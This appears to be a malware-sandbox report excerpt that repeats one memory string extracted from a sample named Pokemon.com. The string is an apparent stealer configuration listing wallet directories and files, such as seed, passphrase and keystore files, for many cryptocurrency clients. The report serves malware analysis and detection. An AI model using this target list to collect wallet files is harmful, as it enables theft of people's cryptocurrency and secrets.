                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                Source: Pokemon.com, 0000000C.00000002.3076149953.00000000043DC000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: tream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
